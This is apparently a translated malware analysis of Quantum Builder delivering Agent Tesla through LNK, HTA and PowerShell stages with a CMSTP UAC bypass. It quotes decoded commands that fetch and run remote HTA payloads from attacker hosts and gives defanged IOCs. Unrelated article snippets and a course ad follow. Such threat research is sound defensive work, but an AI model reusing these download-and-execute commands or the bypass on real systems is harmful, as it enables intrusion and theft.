Quantum 构建工具使用新的 TTP 投递 Agent Tesla

news2024/12/26 13:57:41

Zscaler 的研究人员发现暗网上正在出售名为 Quantum Builder 的构建工具,该工具可以投递 .NET 远控木马 Agent
Tesla。与过去的攻击行动相比,本次攻击转向使用 LNK 文件。

Quantum Builder 能够创建恶意文件,如 LNK、HTA 与 PowerShell,最后投递 Agent Tesla。攻击者使用复杂的技术来生成
Payload:

使用 CMSTP 绕过用户账户控制,以便以管理权限执行最终 Payload 并关闭 Windows Defender

利用集成了无文件攻击等多种攻击向量的多阶段感染链

在内存中执行 PowerShell 脚本以进行逃避检测

打开诱饵分散受害者的注意力

后文对感染链进行了深入分析,并对 Quantum Builder 生成的 Payload 进行了比较。

感染链

感染链始于鱼叉邮件,其中包含一个携带 GZIP 文档的 LNK 文件。执行 LNK 文件后,嵌入的 PowerShell 代码会生成 MSHTA
来执行远程服务器上的 HTA 文件。

image.png-133.1kB感染链

HTA 文件解密 PowerShell 脚本,在执行 AES 解密和 GZIP 解压缩后解密并加载另一个 PowerShell 脚本。解密后的
PowerShell 脚本是一个 Downloader,通过远程服务器下载 Agent Tesla,再使用 CMSTP 绕过 UAC 以管理权限执行。

技术分析

鱼叉邮件的主题为订单确认,如下所示:

image.png-284.5kB鱼叉邮件

邮件带有一个 GZIP 文件作为附件,与带有 PDF 图标的恶意 LNK 文件捆绑在一起。执行后 LNK 文件会运行混淆的 PowerShell 代码,经过
base64 解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta

image.png-181.9kB执行混淆代码

image.png-95.2kB通过
MSHTA 执行远程服务器上的 HTA 文件

HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。

image.png-87.5kBHTA
主要函数

解密出来的 PowerShell 脚本如下所示:

image.png-229.6kB解密
PowerShell 代码

解密完成后,恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell 对象,然后通过 Run 方法执行解密后的
PowerShell 脚本。

image.png-249.5kBPowerShell
代码执行

解密的代码以隐藏窗口的形式执行,解密后会获取另一个 PowerShell 代码。

image.png-377.6kB执行新的
PowerShell 代码

IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码:

从远程服务器下载 Agent Tesla 的 Payload

执行 CMSTP 绕过 UAC

通过操作文件属性隐藏 Agent Tesla

Agent Tesla 被硬编码命名为 MuUQDuaFNoGmHQE.exe,并且被最终执行:

image.png-118.9kB解密
PowerShell 代码

解密可获取 Agent Tesla 的部署地址:

image.png-70.9kBURL
解密

image.png-126.3kB下载
Agent Tesla

通过 WriteAllBytes() 函数写入磁盘,路径为
C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe

image.png-48.2kB写入指定位置

Agent Tesla 二进制文件的路径作为参数传递给 PowerShell 脚本中的 CMSTP UAC Bypass
函数。该函数最初解码一个特别大的、base64 编码的数据块,如下所示:

image.png-692.3kBCMSTP
UAC Bypass

解码后的代码是基于 PowerShell 的 CMSTP UAC Bypass PoC,在
[GitHub](https://github.com/tylerapplebaum/CMSTP-
UACBypass/blob/master/UACBypassCMSTP.ps1)上也能够找到。基于 PowerShell 的 CMSTP UAC 绕过
PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件,其中 PowerShell 脚本中的 $CommandToExecute变量是
Agent Tesla 二进制文件的路径。

image.png-265.3kB恶意
INF 文件

将 INF 文件写入临时目录后,PowerShell 代码会生成一个新进程 cmstp.exe,并以 /au $InfFileLocation作为参数,然后安装恶意 INF 文件,如下所示:

image.png-31.8kB恶意
INF 文件作为参数执行 CMSTP

在 cmstp.exe 安装 INF 文件时,RunPreSetupCommandsSection 参数中的命令将以管理权限执行。该脚本将 [ENTER]
按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。

image.png-14.4kB触发
UAC 绕过

当以恶意 INF 作为参数生成 cmstp.exe 时,就会以管理权限执行恶意软件,如下所示:

image.png-89.9kBUAC
绕过并以管理权限执行

Agent Tesla 的 C&C 服务器被配置为:

image.png-10kB配置信息

C&C 通信如下所示:

image.png-174.6kBC&C
通信

PowerShell 代码还通过操作隐藏文件属性来隐藏 Agent Tesla 二进制文件,如下所示:

image.png-74.1kB隐藏文件

攻击变化

感染链的另一个变种,LNK 文件被捆绑在 ZIP 压缩包中。通过命令 Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta来执行远程 HTA
文件。通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件,如下所示。

image.png-507kB通过
LNK 执行 HTA 文件

MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。

image.png-255.8kBHTA
文件解密 PowerShell 代码

除了 Run() 方法之外,在某些情况下,HTA 文件利用 ShellExecute() 方法执行 PowerShell 代码,如下所示:

image.png-366.1kB通过
ShellExecute() 执行代码

下载落地后,使用 Start-Process() 从 AppData 路径执行 Agent Tesla。如果 Payload 的扩展名为
.dll,则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。

image.png-447.7kB通过解密的
PowerShell 代码下载并执行 Agent Tesla

在某些情况下,还会有在内存中解密的 PowerShell 代码。代码使用 Invoke-Item
函数下载并执行了一个诱饵文件,以此来分散受害者的注意力,如下所示:

image.png-228.5kB诱饵执行

C&C 服务器的配置为:

image.png-10.3kB配置信息

C&C 通信如下所示:

image.png-235kBC&C
通信

Quantum

这些恶意文件都是由名为 Quantum Builder 的构建工具创建的,如下所示:

image.png-257.1kBQuantum
Builder

HTA 生成工具

HTA 生成工具如下所示:

image.png-165.5kBHTA
生成工具

用户输入传递给 HTA Builder 函数以构造 HTA 文件,如下所示:

image.png-439.4kBHTA
生成工具

将此代码与之前分析的 HTA 代码比较,可以确定 Payload 是由 Quantum Builder 生成的。

image.png-121.9kB在野
HTA 文件

LNK 生成工具

LNK 生成工具如下所示:

image.png-118.9kBLNK
生成工具

快捷方式的构造参数有 Description、IconLocation、Target Path、Arguments 和 WindowStyle,如下所示:

image.png-365.1kBLNK
生成工具

将此代码与之前分析的 LNK 代码比较,可以确定 Payload 是由 Quantum Builder 生成的。

image.png-72.7kB在野
LNK 文件

LNK 构建工具还可以生成 ISO 文件的 Payload,如下所示:

image.png-72.9kBISO
生成工具

Quantum Builder 已被攻击者多次利用,部署了多个恶意软件家族:

RedLine Stealer

IcedID

GuLoader

RemcosRAT and AsyncRAT

结论

攻击者会不断更新技术手段,利用各种恶意软件进行攻击。本次使用的 Agent Tesla 是最新的,Quantum Builder
已经被应用在各种攻击活动中投递各种恶意样本。

IOC

3edfa0cf3b7d54c24013e4f0019dba20
bb914889d5edc6b56c666d2e44e1a437
1adc0bd494cd42578ac8c8e726d5ad92
31c341ad31224cc7d38a5c4e80ccb727
f931773a226809669cad91410a57267f
d9433faddcaca526b26f713e27e2505f
213ada506251c477480bd14ea5507bf3
0ebb9d422f8e86458d8fa7f66fe1d0f1
563fda5da81a5e7818d771222e81f6c4
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
mail[.]thesharpening.com[.]au
ftp[.]qurvegraphics[.]com

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/333961.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

clickhouse集群安装

单机安装 yum install yum-utilsrpm --import https://repo.clickhouse.com/CLICKHOUSE-KEY.GPGyum-config-manager --add-repo https://repo.clickhouse.com/rpm/clickhouse.reposudo yum install clickhouse-server clickhouse-client 配置文件 vim /etc/clickhouse-serve…

FFmpeg集成qsv的编译安装

文章目录FFmpeg集成qsv的编译安装一、参考二、编译安装流程1. LibVA 和 Media-Driver 的安装2. Intel Media SDK 编译3. ffmpeg的编译安装4. 验证安装FFmpeg集成qsv的编译安装 一、参考 Ubuntu20.04 ffmpeg添加 Intel核显QSV加速支持 视频和视频帧&#xff1a;Intel GPU&…

SpringCloud保姆级搭建教程四---Gateway

1、gateway干嘛用的呢&#xff1f; 答&#xff0c;系统保安&#xff0c;所有想访问系统的请求都要通过gateway2、来吧&#xff0c;开始吧。第一步&#xff0c;创建个模块&#xff0c;就叫gateway。创建模块的步骤&#xff0c;前面都贴过图哦3、添加依赖&#xff0c;在gateway模…

SSRF漏洞 | iwebsec

文章目录SSRF漏洞介绍00-SSRF漏洞验证01-SSRF漏洞文件读取02-SSRF漏洞内网探测03-SSRF漏洞内网应用攻击源码分析SSRF漏洞介绍 这篇文章写地很好。 SSRF&#xff08;Sever-Side-Request-Forgery&#xff0c;服务端请求伪造&#xff09;是一种由攻击者构造请求&#xff0c;由服…

【逐步剖C】-第六章-结构体初阶

一、结构体的声明 1. 结构体的基本概念 结构体是一些值的集合&#xff0c;这些值称为成员变量。结构体的每个成员可以是不同类型的变量。结构体使得C语言有能力描述复杂类型。 如学生&#xff0c;有姓名、学号、性别等&#xff1b;如书&#xff0c;有作者&#xff0c;出版日期…

LeetCode-(94,144,145).二叉树的前中后续遍历

目录二叉树的前序遍历二叉树的中序遍历二叉树的后序遍历二叉树的前序遍历 递归 class Solution {public List<Integer> preorderTraversal(TreeNode root) {List<Integer> list new ArrayList<>();dfs(root,list);return list;}public static void dfs(T…

C# JSON的使用实例和jsonNet程序包的安装

建一个txt文档&#xff0c;存放json内容[{"id":2,"name":"净化","damage":0},{"id":4,"name":"隐身","damage":10000},{"id":6,"name":"疾跑","damage&q…

出现failed to load steamui.dll如何解决?好的修复方法推荐

当你电脑突然出现failed to load steamui.dll的时候&#xff0c;你是否一脸懵逼&#xff1f;根本不知道发生啥时候&#xff0c;突然就会这样报错&#xff0c;其实造成这个原因&#xff0c;主要是因为问题出在steam上&#xff0c;我们还是有很多种方法可以解决的&#xff0c;今天…

OpenCV基础知识与基本操作

1 基本语法操作 1 读取图像 读取图像的如法如下 img cv2.imread(图像地址[,flags])cv2暂不支持读取中文路径&#xff0c;所以务必确认地址中不含中文。 flags为选填项&#xff0c;可以设置读取图片时的处理方式: cv2.IMREAD_UNCHANGED&#xff1a;-1&#xff0c;读入图像并…

一天一道力扣题

300. 最长递增子序列给你一个整数数组 nums &#xff0c;找到其中最长严格递增子序列的长度。子序列 是由数组派生而来的序列&#xff0c;删除&#xff08;或不删除&#xff09;数组中的元素而不改变其余元素的顺序。例如&#xff0c;[3,6,2,7] 是数组 [0,3,1,6,2,2,7] 的子序列…

es-04搜索和查询

文章目录搜索和查询查询的上下文查询语法1.Searchtimeout&#xff1a;2.ES常用查询&#xff1a;(1)Query_string&#xff1a;(2)Query DSL&#xff1a;(3)Full-text queries&#xff1a;全文检索(5)Query and filter&#xff1a;查询和过滤Deep paging图解Scroll search&#x…

Centos7基于docker搭建gitlab mysql tomcat

STEP1 搭建gitlab$ sudo yum install docker-ce $ sudo systemctl start docker搜索Gitlab镜像 并拉取$ docker search gitlab $ docker pull beginor/gitlab-ce:11.0.1-ce.0 //选择自己要安装的版本在服务器本地创建需要映射的文件 etc&#xff08;配置&#xff09; data&…

网关服务限流熔断降级分布式事务

目录一、网关服务限流熔断降级二、Seata--分布式事务1、分布式事务基础①事务②本地事物③分布式事务④分布式事务的场景2、分布式事务解决方案①全局事务②最大努力通知③TCC事务3、Seata介绍4、Seata实现分布式事务控制①案例基本代码&#xff08;异常模拟&#xff09;②启动…

机器学习调参

机器学习调参常用调参方法举例K邻近算法&#xff08;最常规版本&#xff09;加入交叉验证加上网格搜索GridSearchCV函数介绍GridSearchCVcross_val_score常用调参方法举例 sklearn使得我们在很多编写代码的时候更多的工作倾向于调参数而不是去写算法本身&#xff0c;本篇文章整…

HTML表单(属性/元素/输入类型/输入属性):看这一篇就够了

HTML表单 HTML 表单用于搜集不同类型的用户输入。 <form> 元素 HTML 表单用于收集用户输入。 <form> 元素定义 HTML 表单&#xff1a; 实例 <form>form elements</form> HTML 表单包含表单元素。 表单元素指的是不同类型的 input 元素、复选框、单…

maven 命令指定配置文件打包springboot项目

再开发过程中&#xff0c;通常用工具集成了maven&#xff0c;很少直接用maven命令操作打包&#xff0c;记不住&#xff0c;麻烦有时候工具也出现问题&#xff0c;只能用命令行下面很有必要记录一下这个过程我这里用idea编辑器&#xff0c;项目原因 打包本地配置环境可以&#x…

Oracle MAA 参考架构

文章目录总览青铜青铜 MAA 参考架构青铜特性青铜停机时间总结白银白银 MAA 参考架构白银特性白银停机时间总结黄金黄金 MAA 参考架构远程备库多备库备库读取器农场跨区域远程同步备库黄金特性黄金停机时间总结白金白金 MAA 参考架构白金特性白金停机时间总结参考文档总览 图1 …

Springboot+vue+hadoop+java图书个性化推荐系统

前台首页功能模块 3.1首页 图书个性化推荐系统&#xff0c;在前台首页可以查看首页、图书信息、好书推荐、留言反馈、个人中心、后台管理等内容&#xff0c;如图 3.2图书信息 在图书信息页面通过查看图书编号、图书名称、图书类别、图片、作者、出版社、版次、数量、点击次数等…

python自学之《21天学通Python》(10)——正则表达式

第13章 正则表达式 最初的正则表达式出现于理论计算机科学的自动控制理论和形式化语言理论中。在这些领域中有对计算&#xff08;自动控制&#xff09;的模型和对形式化语言描述与分类的研究。 程序员所用的正则表达式是指用某种模式去匹配一类具有共同特征的字符串。正则表达…

ant-design V4升级V5记录(成功篇)

官方文档&#xff1a;https://ant.design/docs/react/migration-v5-cn 1、安装运行工具之前&#xff0c;提交本地修改内容&#xff1b; 2、工具运行完&#xff0c;根据提示修改文件问题&#xff1b; 3、移除config文件中module&#xff0c; [import,{libraryName:antd, libr…